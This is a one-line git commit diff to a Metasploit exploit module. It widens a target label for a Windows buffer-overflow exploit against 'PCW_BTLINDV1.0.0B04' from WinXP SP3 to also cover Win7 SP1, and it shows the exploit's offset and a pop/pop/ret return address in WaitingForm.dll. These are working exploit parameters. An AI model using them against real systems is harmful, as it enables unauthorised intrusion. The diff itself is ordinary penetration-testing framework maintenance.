Add Win7 SP1 to WinXP SP3 target

bug/bundler_fix
William Vu 2013-10-29 10:45:14 -05:00
parent ea7bba4035
commit e368cb0a5e
1 changed files with 1 additions and 1 deletions

View File

@ -35,7 +35,7 @@ class Metasploit4 < Msf::Exploit
}, },
'Platform' => "win", 'Platform' => "win",
'Targets' => [ 'Targets' => [
["PCW_BTLINDV1.0.0B04 (WinXP SP3)", { ["PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)", {
"Offset" => 468, "Offset" => 468,
"Ret" => 0x0105e2f6 # p/p/r (WaitingForm.dll 1.0.0.0) "Ret" => 0x0105e2f6 # p/p/r (WaitingForm.dll 1.0.0.0)
}] }]